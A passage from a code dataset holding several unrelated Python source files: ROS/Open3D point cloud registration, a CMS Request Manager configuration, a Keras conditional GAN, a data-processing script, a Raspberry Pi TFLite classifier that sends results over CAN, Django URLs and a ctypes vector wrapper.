print(pose_graph.nodes[point_id].pose)\n pcds_down[point_id].transform(pose_graph.nodes[point_id].pose)\n o3d.visualization.draw_geometries(pcds_down)\n\n print(\"Make a combined point cloud\")\n # pcds = load_point_clouds(voxel_size)\n pcds = [pcd.voxel_down_sample(voxel_size=self.voxel_size) for pcd in pcd_list]\n pcd_combined = o3d.geometry.PointCloud()\n for point_id in range(len(pcds)):\n pcds[point_id].transform(pose_graph.nodes[point_id].pose)\n pcd_combined += pcds[point_id]\n pcd_combined_down = pcd_combined.voxel_down_sample(voxel_size=self.voxel_size)\n o3d.io.write_point_cloud(\"./multiway_registration.pcd\", pcd_combined_down)\n o3d.visualization.draw_geometries([pcd_combined_down])\n\n\n def get_transform_point_cloud_from_raw_data(self, data, camera_key):\n if 'overhead' in camera_key:\n color = [255, 0, 0]\n else:\n color = [0, 0, 255]\n color = None\n # pcl_arr = point_cloud_to_mat(data)\n pcl_arr, rgb_arr = point_cloud_to_color_arr(data, color=color)\n # T = self.transform_by_camera[camera_key]\n # transf_pcl_arr = np.dot(T.matrix, pcl_arr.T)\n if camera_key == 'front_right_no':\n # transf_pcl_arr = np.dot(self.T_overhead_front_right.matrix, pcl_arr.T)\n M = self.stereo_calib_dict['overhead$front_right'].inverse().matrix\n # M[0, 3] = self.T_overhead_front_right.matrix[0, 3]\n # M[1, 3] = self.T_overhead_front_right.matrix[1, 3]\n # M[2, 3] = self.T_overhead_front_right.matrix[2, 3]\n transf_pcl_arr = np.dot(M, pcl_arr.T)\n elif camera_key == 'front_left': \n # We don't take an inverse since we want to view everything in the overhead \n # camera's frame.\n M = self.stereo_calib_dict['front_left$overhead'].matrix\n transf_pcl_arr = np.dot(M, pcl_arr.T)\n elif camera_key == 'back_left':\n M = self.stereo_calib_dict['back_left$front_left'].matrix\n transf_pcl_arr = np.dot(M, pcl_arr.T)\n elif camera_key == 'back_right':\n M = self.stereo_calib_dict['back_right$front_right'].matrix\n transf_pcl_arr = np.dot(M, pcl_arr.T)\n else:\n transf_pcl_arr = np.dot(np.eye(4), pcl_arr.T)\n\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(transf_pcl_arr[:3, :].T)\n pcd.colors = o3d.utility.Vector3dVector(rgb_arr[:, :3]/255.0)\n return pcd\n\n def pcl_callback(self, data):\n rospy.loginfo(\"Got data: {}\".format(type(data)))\n # cloud, rgb = get_cloud(data)\n cloud_arr, rgb_arr = point_cloud_to_color_arr(data)\n\n point_cloud_arr = point_cloud_to_mat(data)\n # T_mat = transform.matrix\n # rospy.loginfo('point_cloud_arr: {}'.format(point_cloud_arr.shape))\n # transf_pc_arr = np.dot(T_mat, point_cloud_arr)\n print(cloud_arr.shape)\n print(point_cloud_arr.shape)\n\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(cloud_arr[:, :3])\n pcd.colors = o3d.utility.Vector3dVector(rgb_arr[:, :3]/255.0)\n # o3d.io.write_point_cloud(\"./open3d_sync.ply\", pcd)\n\n # Load saved point cloud and visualize it\n # pcd_load = o3d.io.read_point_cloud(\"./open3d_sync.ply\")\n o3d.visualization.draw_geometries([pcd])\n\n def save_pcd_with_camera_key(self, data, camera_key):\n if self.has_pcd_by_camera_dict.get(camera_key):\n return\n print(\"Will save pcd for camera: {}\".format(camera_key))\n pcd = self.get_transform_point_cloud_from_raw_data(data, camera_key)\n\n print(\"back_right bounds BEFORE crop: => {}\".format(get_pcd_bounds_str(pcd)))\n # pcd = pcd.crop(self.pcl_volume_min_bound, self.pcl_volume_max_bound)\n print(\"back_right bounds AFTER crop: => {}\".format(get_pcd_bounds_str(pcd)))\n\n self.point_cloud_by_camera_dict[camera_key] = pcd\n self.has_pcd_by_camera_dict[camera_key] = True\n rospy.loginfo(\"Did get camera data {}\".format(camera_key))\n idx = max_test_overhead_idx() + 1\n pcd_path = os.path.join('./register_{}_data_{}.pcd'.format(camera_key, idx))\n o3d.io.write_point_cloud(pcd_path, pcd)\n rospy.loginfo(\"Did save pcd: {}\".format(pcd_path))\n\n def back_right_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'back_right')\n\n def front_right_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'front_right')\n\n def front_left_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'front_left')\n\n def back_left_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'back_left')\n\n def overhead_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'overhead')\n\n\ndef main():\n rospy.init_node('test_k4a_pcl', anonymous=True)\n rospy.loginfo('Test k4a pcl!!')\n\n o3d.utility.set_verbosity_level(o3d.utility.VerbosityLevel.Debug)\n\n pcl_reg = PCLRegistrationUtils()\n rospy.loginfo(\"Did load transform for camers: {}\".format(len(pcl_reg.transform_by_camera)))\n\n pc_topics_by_callback = [\n # ('/points2', pcl_callback),\n # ('/back_right_kinect/points2', pcl_reg.back_right_pcl_callback),\n # ('/front_right_kinect/points2', pcl_reg.front_right_pcl_callback),\n ('/front_left_kinect/points2', pcl_reg.front_left_pcl_callback),\n ('/overhead_kinect/points2', pcl_reg.overhead_pcl_callback),\n # ('/back_left_kinect/points2', pcl_reg.back_left_pcl_callback),\n ]\n # pc_topic = \"/points2\"\n # pc_sub = rospy.Subscriber(pc_topic, PointCloud2, pcl_callback)\n for p in pc_topics_by_callback:\n pc_sub = rospy.Subscriber(p[0], PointCloud2, p[1])\n\n while not rospy.is_shutdown():\n rospy.loginfo(\"point_cloud_dict size\".format(len(pcl_reg.point_cloud_by_camera_dict)))\n if len(pcl_reg.point_cloud_by_camera_dict) == 2:\n # Do registration\n # for main and secondary, the first argument should be secondary and then main \n # pcd_list = [\n # pcl_reg.point_cloud_by_camera_dict['front_left'],\n # pcl_reg.point_cloud_by_camera_dict['overhead'],\n # # pcl_reg.point_cloud_by_camera_dict['front_right'],\n # ]\n pcd_list = [\n pcl_reg.point_cloud_by_camera_dict['front_left'],\n pcl_reg.point_cloud_by_camera_dict['overhead'],\n # pcl_reg.point_cloud_by_camera_dict['front_right'],\n ]\n rospy.loginfo(\"Will try to register multiple point clouds.\")\n pcl_reg.merge_multiple_pcd(pcd_list)\n break\n \n # if len(pcl_reg.point_cloud_by_camera_dict) == 1:\n # print(\"Did save some data\")\n # break\n\n rospy.sleep(1.0)\n\n # rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"manipulation/azure_kinect_calibration/k4a_pcl_synthesis_open3d.py","file_name":"k4a_pcl_synthesis_open3d.py","file_ext":"py","file_size_in_byte":17622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"490521657","text":"import os, re, socket, thread\n__all__ = []\nfrom WMCore.WMInit import getWMBASE\nfrom WMCore.Configuration import Configuration\nfrom ReqMgrSecrets import connectUrl\n\n#\n# Configuration that matters\n#\nHOST = socket.getfqdn().lower()\nPORT = 8245\nCOUCH = \"https://%s/couchdb\" % HOST\nif re.match(r\"^vocms(?:13[689]|140|16[13])\\.cern\\.ch$\", HOST):\n COUCH = \"https://cmsweb.cern.ch/couchdb\"\nelif re.match(r\"^vocms(?:13[23])\\.cern\\.ch$\", HOST):\n COUCH = \"https://cmsweb-testbed.cern.ch/couchdb\"\nelif re.match(r\"^vocms127\\.cern\\.ch$\", HOST):\n COUCH = \"https://cmsweb-dev.cern.ch/couchdb\"\n\nconfigCouchDB = 'analysis_reqmgr_config_cache'\nworkloadCouchDB = 'analysis_reqmgr_workload_cache'\nworkloadSummaryCouchDB = \"analysis_workloadsummary\"\nwmstatCouchDB = \"analysis_wmstats\"\nsitedb = 'https://cmsweb.cern.ch/sitedb/json/index/CEtoCMSName?name'\ndbs3 = 'http://vocms09.cern.ch:8989/dbs'\nyuiroot = \"/an_reqmgr/yuiserver/yui\"\n\nINSTALL = getWMBASE()\nTEMPLATES = os.path.normpath(os.path.join(INSTALL, '../../../data/templates/WMCore/WebTools'))\nJAVASCRIPT_PATH = os.path.normpath(os.path.join(INSTALL, '../../../data/javascript'))\nHTML_PATH = os.path.normpath(os.path.join(INSTALL, '../../../data/html'))\nSECURITY_ROLES = ['Admin', 'Developer', 'Data Manager', 'developer', 'admin', 'data-manager', 'facops', 'FacOps']\n\n#\n# Beginning of the boilerplate configuration bits\n#\nconfig = Configuration()\n\nconfig.component_(\"Webtools\")\nconfig.Webtools.host = '0.0.0.0'\nconfig.Webtools.port = PORT\nconfig.Webtools.application = \"an_reqmgr\"\nconfig.Webtools.environment = 'production'\n#config.Webtools.environment = 'development'\nconfig.Webtools.proxy_base = 'True'\nconfig.Webtools.thread_pool = 30\nthread.stack_size(128*1024)\n\nconfig.component_('SecurityModule')\nconfig.SecurityModule.key_file = \"%s/auth/wmcore-auth/header-auth-key\" % __file__.rsplit('/', 3)[0]\n\nconfig.component_('an_reqmgr')\nconfig.section_(\"CoreDatabase\")\nconfig.CoreDatabase.connectUrl = connectUrl\nconfig.an_reqmgr.section_('database')\nconfig.an_reqmgr.database.connectUrl = connectUrl\nconfig.an_reqmgr.componentDir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + \"/var\"\nconfig.an_reqmgr.templates = os.path.join(TEMPLATES, 'RequestManager')\nconfig.an_reqmgr.html = os.path.join(HTML_PATH, 'RequestManager')\nconfig.an_reqmgr.javascript = JAVASCRIPT_PATH\nconfig.an_reqmgr.admin = 'cms-service-webtools@cern.ch'\nconfig.an_reqmgr.title = 'CMS Request Manager'\nconfig.an_reqmgr.description = 'CMS Request Manager'\nconfig.an_reqmgr.couchUrl = COUCH\nconfig.an_reqmgr.configDBName = configCouchDB\nconfig.an_reqmgr.workloadDBName = workloadCouchDB\nconfig.an_reqmgr.wmstatDBName = wmstatCouchDB\nconfig.an_reqmgr.security_roles = SECURITY_ROLES\nconfig.an_reqmgr.yuiroot = yuiroot\nconfig.an_reqmgr.dbs3 = dbs3\n\nviews = config.an_reqmgr.section_('views')\nactive = views.section_('active')\n\nactive.section_('view')\nactive.view.object = 'WMCore.HTTPFrontEnd.RequestManager.ReqMgrBrowser'\n\nactive.section_('admin')\nactive.admin.object = 'WMCore.HTTPFrontEnd.RequestManager.Admin'\n\nactive.section_('approve')\nactive.approve.object = 'WMCore.HTTPFrontEnd.RequestManager.Approve'\n\nactive.section_('assign')\nactive.assign.object = 'WMCore.HTTPFrontEnd.RequestManager.Assign'\nactive.assign.sitedb = sitedb\nactive.assign.opshold = False\nactive.assign.clipboardDB = 'ops_clipboard'\n\nactive.section_('closeout')\nactive.closeout.object = 'WMCore.HTTPFrontEnd.RequestManager.CloseOut'\n\nactive.section_('announce')\nactive.announce.object = 'WMCore.HTTPFrontEnd.RequestManager.Announce'\n\nactive.section_('reqMgr')\nactive.reqMgr.section_('model')\nactive.reqMgr.section_('formatter')\nactive.reqMgr.object = 'WMCore.WebTools.RESTApi'\nactive.reqMgr.model.object = 'WMCore.HTTPFrontEnd.RequestManager.ReqMgrRESTModel'\nactive.reqMgr.default_expires = 0 # no caching\nactive.reqMgr.formatter.object = 'WMCore.WebTools.RESTFormatter'\nactive.reqMgr.templates = TEMPLATES\nactive.reqMgr.html = os.path.join(HTML_PATH, 'RequestManager')\n\nactive.section_('rest')\nactive.rest.section_('model')\nactive.rest.section_('formatter')\nactive.rest.object = 'WMCore.WebTools.RESTApi'\nactive.rest.model.object = 'WMCore.HTTPFrontEnd.RequestManager.ReqMgrRESTModel'\nactive.rest.default_expires = 0 # no caching\nactive.rest.formatter.object = 'WMCore.WebTools.RESTFormatter'\nactive.rest.templates = TEMPLATES\n\nactive.section_('create')\nactive.create.object = 'WMCore.HTTPFrontEnd.RequestManager.WebRequestSchema'\nactive.create.requestor = None\nactive.create.cmsswDefaultVersion = 'CMSSW_5_2_5'\n\nactive.section_('yuiserver')\nactive.yuiserver.object = 'WMCore.WebTools.YUIServer'\nactive.yuiserver.yuidir = os.getenv(\"YUI_ROOT\")\n","sub_path":"an_reqmgr/ReqMgrConfig.py","file_name":"ReqMgrConfig.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"74165259","text":"from keras.layers import Input\nfrom keras.models import Model, load_model\nfrom keras.optimizers import Adam\nimport os\nimport numpy as np\n\n\nfrom . import metrics\nfrom . import utils\n\n# Conditional Generative Adversarial Network\n# Paper: https://arxiv.org/pdf/1411.1784.pdf\n\n# Description:\n# Takes as input dataset with it class labels and learn to generate samples \n# similar to original dataset specified by some given labels.\n\nclass CGAN():\n def metric_test(self, set_data, set_labels, pred_num = 32): \n met_arr = np.zeros(pred_num)\n \n n_indx = np.random.choice(set_data.shape[0],pred_num)\n labels = set_labels[n_indx]\n org_set = set_data[n_indx]\n \n noise = np.random.uniform(-1, 1, (pred_num, self.latent_dim))\n gen_set = self.generator.predict([noise,labels]) \n met_arr = metrics.magic_distance(org_set, gen_set)\n return met_arr\n\n def __init__(self, input_shape, label_shape, latent_dim = 100, mode = 'vanilla'):\n # Input shape\n self.input_shape = input_shape\n self.label_shape = label_shape\n self.latent_dim = latent_dim\n self.mode = mode\n \n self.build_discriminator = None\n self.build_generator = None\n \n self.best_model = None\n self.best_metric = 0\n \n self.epoch = 0\n self.history = None\n \n def build_models(self, optimizer = None, path = ''):\n if optimizer is None:\n optimizer = Adam(0.0002, 0.5)\n \n if self.mode == 'stable':\n loss = 'logcosh'\n self.disc_activation = 'linear'\n elif self.mode == 'vanilla':\n loss = 'binary_crossentropy'\n self.disc_activation = 'sigmoid'\n else: raise Exception(\"Mode '\" + self.mode+ \"' is unknown\")\n \n self.path = path\n if os.path.isfile(path+'/generator.h5') and os.path.isfile(path+'/discriminator.h5'):\n self.generator = load_model(path+'/generator.h5')\n self.discriminator = load_model(path+'/discriminator.h5')\n else:\n if self.build_discriminator is None or self.build_generator is None:\n raise Exception(\"Model building functions are not defined\")\n else:\n # Build and compile the discriminator\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(loss=loss, optimizer=optimizer)\n\n # Build the generator\n self.generator = self.build_generator()\n\n # The generator takes noise and the target label as input\n # and generates the corresponding digit of that label\n noise = Input(shape=(self.latent_dim,))\n label = Input(shape=self.label_shape)\n img = self.generator([noise, label])\n\n # For the combined model we will only train the generator\n self.discriminator.trainable = False\n\n # The discriminator takes generated image as input and determines validity\n # and the label of that image\n valid = self.discriminator([img, label])\n\n # The combined model (stacked generator and discriminator)\n # Trains generator to fool discriminator\n self.combined = Model([noise, label], valid)\n self.combined.compile(loss=loss, optimizer=optimizer)\n \n print('models builded') \n \n def save(self):\n self.generator.save(self.path+'/generator.h5')\n self.discriminator.save(self.path+'/discriminator.h5')\n \n def train(self, data_set, label_set, batch_size=32, epochs=1, verbose=True, checkpoint_range = 100, checkpoint_callback = None, validation_split = 0, save_best_model = False):\n \"\"\"Trains the model for a given number of epochs (iterations on a dataset).\n # Arguments\n data_set: \n Numpy array of training data.\n data_labels: \n Numpy array of labels assigned with data_set \n batch_size:\n Number of samples per gradient update.\n epochs: Number of epochs to train the model.\n An epoch is an iteration over batch sized samples of dataset.\n checkpoint_range:\n Range in witch checkpoint callback will be called and history data will be stored.\n verbose: \n Integer. 0, 1. Verbosity mode.\n checkpoint_callback: List of `keras.callbacks.Callback` instances.\n Callback to apply during training on checkpoint stage.\n validation_split: Float between 0 and 1.\n Fraction of the training data to be used as validation data.\n The model will set apart this fraction of the training data,\n will not train on it, and will evaluate\n the loss and any model metrics\n on this data at the end of each epoch.\n The validation data is selected from the last samples.\n save_best_model:\n Boolean. If True, generator weights will be resigned to best model according to chosen metric.\n # Returns\n A history object. \n \"\"\" \n \n if 0. < validation_split < 1.:\n split_at = int(data_set.shape[0] * (1. - validation_split))\n train_set_data = data_set[:split_at]\n valid_set_data = data_set[split_at:]\n \n train_set_labels = label_set[:split_at]\n valid_set_labels = label_set[split_at:]\n else:\n train_set_data = data_set\n train_set_labels = label_set\n valid_set_data = None\n valid_set_labels = None\n \n #collect statistical info of data\n data_set_std = np.std(data_set,axis = 0)\n data_set_mean = np.mean(data_set,axis = 0)\n \n label_set_std = np.std(label_set,axis = 0)\n label_set_mean = np.mean(label_set,axis = 0)\n \n # Adversarial ground truths\n valid = np.ones((batch_size, 1))\n fake = np.zeros((batch_size, 1))\n\n #mean min max\n max_hist_size = epochs//checkpoint_range + 1\n history = { 'gen_val' :np.zeros((max_hist_size,3)), \n 'train_val' :np.zeros((max_hist_size,3)), \n 'test_val' :np.zeros((max_hist_size,3)), \n 'data_control_val' :np.zeros((max_hist_size,3)), \n 'label_control_val' :np.zeros((max_hist_size,3)), \n 'metric' :np.zeros((max_hist_size,3)),\n 'best_metric' :0,\n 'hist_size' :0}\n \n for epoch in range(epochs):\n self.epoch = epoch\n \n # ---------------------\n # Train Discriminator\n # ---------------------\n\n # Select a random batch of images\n idx = np.random.randint(0, train_set_data.shape[0], batch_size)\n imgs, labels = train_set_data[idx], train_set_labels[idx]\n\n # Sample noise as generator input\n noise = np.random.uniform(-1, 1, (batch_size, self.latent_dim))\n\n # Generate new images\n gen_imgs = self.generator.predict([noise, labels])\n \n if self.mode == 'stable':\n trash_imgs = imgs.copy()\n trash_labels = labels.copy()\n trash_imgs[:batch_size//2] = np.random.normal(data_set_mean, data_set_std, (batch_size//2,) + self.input_shape)\n trash_labels[batch_size//2:] = np.random.normal(label_set_mean, label_set_std, (batch_size//2,) + self.label_shape)\n \n #trash_imgs = np.random.normal(train_set_mean, train_set_std, (batch_size,) + self.input_shape)\n\n # Validate how good generated images looks like\n val = self.discriminator.predict([gen_imgs,labels])\n crit = utils.Gravity(val, boundaries = [-1,1])\n \n # Train the discriminator\n d_loss_real = self.discriminator.train_on_batch([imgs,labels], valid)\n d_loss_fake = self.discriminator.train_on_batch([gen_imgs,labels], crit)\n d_loss_trsh = self.discriminator.train_on_batch([trash_imgs, trash_labels], -valid)\n d_loss = (d_loss_real + d_loss_fake + d_loss_trsh) / 3\n elif self.mode == 'vanilla':\n d_loss_real = self.discriminator.train_on_batch([imgs,labels], valid)\n d_loss_fake = self.discriminator.train_on_batch([gen_imgs,labels], fake)\n d_loss = (d_loss_real + d_loss_fake) / 2\n \n else: raise Exception(\"Mode '\" + self.mode+ \"' is unknown\")\n \n # ---------------------\n # Train Generator\n # ---------------------\n \n # Train the generator\n g_loss = self.combined.train_on_batch([noise, labels], valid)\n\n # Plot the progress\n if epoch % checkpoint_range == 0:\n gen_val = self.discriminator.predict([gen_imgs, labels])\n train_val = self.discriminator.predict([imgs, labels])\n \n if valid_set_data is not None and valid_set_labels is not None: \n idx = np.random.randint(0, valid_set_data.shape[0], batch_size)\n test_val = self.discriminator.predict([valid_set_data[idx], valid_set_labels[idx]])\n else:\n test_val = np.zeros(batch_size)\n \n noise_as_data = np.random.normal(data_set_mean, data_set_std, (batch_size,)+ self.input_shape)\n noise_as_labels = np.random.normal(label_set_mean, label_set_std, (batch_size,)+ self.label_shape)\n data_cont_val = self.discriminator.predict([noise_as_data, labels])\n label_cont_val = self.discriminator.predict([imgs, noise_as_labels])\n \n metric = self.metric_test(train_set_data, train_set_labels, 1000)\n if verbose:\n print (\"%d [D loss: %f] [G loss: %f] [validations TRN: %f, TST: %f] [metric: %f]\" % (epoch, d_loss, g_loss, np.mean(train_val), np.mean(test_val), np.mean(metric)))\n \n hist_size = history['hist_size'] = history['hist_size']+1\n history['gen_val'] [hist_size-1] = np.mean(gen_val), np.min(gen_val), np.max(gen_val)\n history['train_val'] [hist_size-1] = np.mean(train_val),np.min(train_val),np.max(train_val)\n history['test_val'] [hist_size-1] = np.mean(test_val), np.min(test_val), np.max(test_val)\n history['data_control_val'] [hist_size-1] = np.mean(data_cont_val), np.min(data_cont_val), np.max(data_cont_val) \n history['label_control_val'][hist_size-1] = np.mean(label_cont_val), np.min(label_cont_val), np.max(label_cont_val) \n history['metric'] [hist_size-1] = np.mean(metric), np.min(metric), np.max(metric)\n \n if np.mean(metric)*0.98 < self.best_metric or self.best_model == None:\n self.best_model = self.generator.get_weights()\n self.best_metric = np.mean(metric)\n history['best_metric'] = self.best_metric\n \n self.history = history\n \n if checkpoint_callback is not None:\n checkpoint_callback()\n \n \n \n if save_best_model:\n self.generator.set_weights(self.best_model) \n \n self.epoch = epochs\n checkpoint_callback() \n \n return self.history ","sub_path":"GANLib/CGAN.py","file_name":"CGAN.py","file_ext":"py","file_size_in_byte":11793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"64589042","text":"\"\"\"Create GVA per capita\n\nAfter running `simim` to provide population scenarios\n\"\"\"\nimport glob\nimport os\nimport sys\n\nimport pandas\n\n\ndef main(base_path):\n print(\"Start\")\n data_path = os.path.join(base_path, 'data_as_provided')\n output_path = os.path.join(base_path, 'data_processed')\n\n pop_filenames = glob.glob(os.path.join(data_path, 'arc_population__*.csv'))\n\n for pop_filename in pop_filenames:\n print(\"Processing\", pop_filename)\n key = os.path.basename(pop_filename).replace(\n 'arc_population__', '').replace('.csv', '')\n\n # HACK hard-code match for economics scenarios against 23k dwellings scenarios\n if \"new-cities\" in key:\n econ_key = \"1-new-cities\"\n elif key == \"4-expansion23\":\n econ_key = \"2-expansion\"\n else:\n econ_key = key\n\n econ_filename = os.path.join(output_path, 'arc_gva__{}.csv'.format(econ_key))\n\n gvapc = process_to_per_head(pop_filename, econ_filename)\n gvapc.to_csv(\n os.path.join(output_path, 'arc_gva_per_head__{}.csv'.format(key)), index=False)\n\n\ndef process_to_per_head(pop_filename, econ_filename):\n pop = pandas.read_csv(pop_filename)\n gva = pandas.read_csv(econ_filename)\n\n gvapc = gva.merge(pop, on=['timestep', 'lad_uk_2016'])\n gvapc['gva_per_head'] = gvapc.gva / gvapc.population\n gvapc = gvapc[['timestep', 'lad_uk_2016', 'gva_per_head']]\n return gvapc\n\n\nif __name__ == '__main__':\n try:\n BASE_PATH = sys.argv[1]\n except:\n print(\"Usage: python {} \".format(__file__))\n exit(-1)\n\n main(BASE_PATH)\n","sub_path":"post-population.py","file_name":"post-population.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"376883817","text":"# python3\n#\n# Copyright 2019 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Example using TF Lite to classify objects with the Raspberry Pi camera.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport io\nimport time\nimport numpy as np\nimport picamera\nimport can\nfrom PIL import Image\nfrom tflite_runtime.interpreter import Interpreter\n\ndef load_labels(path):\n with open(path, 'r') as f:\n return {i: line.strip() for i, line in enumerate(f.readlines())}\n\n\ndef set_input_tensor(interpreter, image):\n tensor_index = interpreter.get_input_details()[0]['index']\n input_tensor = interpreter.tensor(tensor_index)()[0]\n input_tensor[:, :] = image\n\n\ndef classify_image(interpreter, image, top_k=1):\n \"\"\"Returns a sorted array of classification results.\"\"\"\n set_input_tensor(interpreter, image)\n interpreter.invoke()\n output_details = interpreter.get_output_details()[0]\n output = np.squeeze(interpreter.get_tensor(output_details['index']))\n\n # If the model is quantized (uint8 data), then dequantize the results\n if output_details['dtype'] == np.uint8:\n scale, zero_point = output_details['quantization']\n output = scale * (output - zero_point)\n\n ordered = np.argpartition(-output, top_k)\n return [(i, output[i]) for i in ordered[:top_k]]\n\n\ndef main():\n global prev_label_id\n tempDict = {\"1\":0,\"2\":0,\"3\":0,\"4\":0}\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--model', help='File path of .tflite file.', required=True)\n parser.add_argument(\n '--labels', help='File path of labels file.', required=True)\n args = parser.parse_args()\n\n labels = load_labels(args.labels)\n\n interpreter = Interpreter(args.model)\n interpreter.allocate_tensors()\n _, height, width, _ = interpreter.get_input_details()[0]['shape']\n \n print(height,width)\n frame = 0\n with picamera.PiCamera(resolution=(640, 320), framerate=30) as camera: ### (640,480) -> (640,320)\n camera.start_preview()\n try:\n stream = io.BytesIO()\n count = 0\n for _ in camera.capture_continuous(\n stream, format='jpeg', use_video_port=True):\n stream.seek(0)\n image = Image.open(stream).convert('RGB').resize((width, height),\n Image.ANTIALIAS)\n #if frame % 2 != 0:\n # continue\n start_time = time.time()\n results = classify_image(interpreter, image)\n elapsed_ms = (time.time() - start_time) * 1000\n label_id, prob = results[0]\n if prob < 0.5:\n label_id = 4\n tempDict[str(label_id)] +=1\n if(count == 10):\n tempMax = max(tempDict.items())\n for index in tempDict.keys():\n if (tempDict[index] == tempMax):\n canSend(int(index))\n count = 0\n tempDict = {\"1\":0,\"2\":0,\"3\":0,\"4\":0}\n ################### LABEL_ID 0,1,2,3,4 --> 40limit, 40-nolimit, cross, stop, zbackground \n \n print(labels[label_id], label_id, prob,elapsed_ms)\n stream.seek(0)\n stream.truncate()\n camera.annotate_text = '%s %d %.2f\\n%.1fms' % (labels[label_id], label_id, prob,\n elapsed_ms)\n count+=1\n finally:\n camera.stop_preview()\n\ndef canSend(label_id):\n messageCAN = [0,0,0,0,0,0,0,0]\n #if(label_id != prev_label_id):\n messageCAN[2] = label_id\n bus = can.interface.Bus(bustype='socketcan',\n channel='can0',\n bitrate=500000)\n #CAN ID 0x2A = 42\n message = can.Message(arbitration_id=42, data=messageCAN)\n bus.send(message)\n prev_label_id = label_id\n time.sleep(1)\nif __name__ == '__main__':\n main()\n","sub_path":"classify_picamera.py","file_name":"classify_picamera.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"628242049","text":"\nfrom django.conf.urls import patterns, url\nfrom Pac import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.IndexView.as_view(), name='index'),\n\turl(r'^press/', views.PressView.as_view(), name='press'),\n\turl(r'^press-release/(?P[-\\w]+)/$', views.PressDetailView.as_view(), name=\"press-detail\"),\n\turl(r'^thanks/', views.ThanksView.as_view(), name='thanks'),\n\turl(r'^terms-and-conditions/', views.TermView.as_view(), name='terms'),\n\turl(r'^contact/', views.ContactView.as_view(), name='contact'),\n\t)","sub_path":"Pac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"26787002","text":"from ctypes import *\r\nfrom ctypes_wrap import *\r\n\r\nclass cVector:\r\n def __init__(self, p, dim=None, offset=0, vector=None):\r\n self.freed = False\r\n self.p = p \r\n if vector != None and type(vector) != list:\r\n self.dimension = vector.contents.dimension\r\n self.c_list_type = c_uint * self.dimension\r\n self.vector = vector\r\n return\r\n \r\n if type(vector) == list:\r\n dim = len(vector)\r\n\r\n self.dimension = dim\r\n self.c_list_type = c_uint * self.dimension\r\n CSteenrod.initializePrime(p)\r\n self.vector = CSteenrod.Vector_construct(p, dim, offset)\r\n\r\n if type(vector) == list:\r\n self.pack(vector) \r\n\r\n def free(self):\r\n if not self.freed:\r\n CSteenrod.Vector_free(self.vector)\r\n self.freed = True\r\n\r\n def assign(self, w):\r\n CSteenrod.Vector_assign(self.vector, w.vector)\r\n \r\n def pack(self, list):\r\n if self.dimension != len(list):\r\n raise Exception(\"Wrong length.\")\r\n c_list = self.c_list_type()\r\n for i, elt in enumerate(list):\r\n c_list[i] = elt % self.p\r\n CSteenrod.Vector_pack(self.vector, c_list)\r\n\r\n def unpack(self):\r\n c_list = self.c_list_type()\r\n CSteenrod.Vector_unpack(c_list, self.vector)\r\n py_list = [None] * self.dimension\r\n for i in range(self.dimension):\r\n py_list[i] = c_list[i]\r\n return py_list \r\n \r\n def addBasisElement(self, idx, c=1):\r\n c = c % self.p\r\n CSteenrod.Vector_addBasisElement(self.vector, idx, c)\r\n\r\n def add(self, w, c=1):\r\n c = c % self.p\r\n CSteenrod.Vector_add(self.vector, w.vector, c)\r\n \r\n \r\n def scale(self, c):\r\n c = c % self.p\r\n CSteenrod.Vector_scale(self.vector, c)\r\n\r\n def slice(self, min, max):\r\n cSlice = CSteenrod.Vector_construct(self.p, 0, 0)\r\n CSteenrod.Vector_slice(cSlice, self.vector, min, max)\r\n slice = cVector(self.p, vector=cSlice)\r\n slice.dimension = cSlice.contents.dimension\r\n return slice\r\n\r\n def __len__(self):\r\n return self.dimension\r\n \r\n def __setitem__(self, idx, value):\r\n CSteenrod.Vector_setEntry(self.vector, idx, (value % self.p))\r\n\r\n def __getitem__(self, key):\r\n if isinstance(key, slice):\r\n #Get the start, stop, and step from the slice\r\n if(key.step != None and key.step != 1):\r\n print(key.step)\r\n raise(IndexError(\"Slice steps not equal to 1 not supported.\"))\r\n return self.slice(key.start, key.stop)\r\n elif isinstance(key, int):\r\n if key < 0 : #Handle negative indices\r\n key += len(self)\r\n if key < 0 or key >= len(self):\r\n raise(IndexError(\"The index (%d) is out of range.\"%key))\r\n return CSteenrod.Vector_getEntry(self.vector, key)\r\n else:\r\n raise TypeError(\"Invalid argument type.\")\r\n\r\n def __iter__(self):\r\n return cVector_iterator(self)\r\n\r\n\r\nclass cVector_iterator:\r\n def __init__(self, vector):\r\n self.cIterator = CSteenrod.Vector_getIterator(vector.vector)\r\n\r\n def __next__(self):\r\n if not 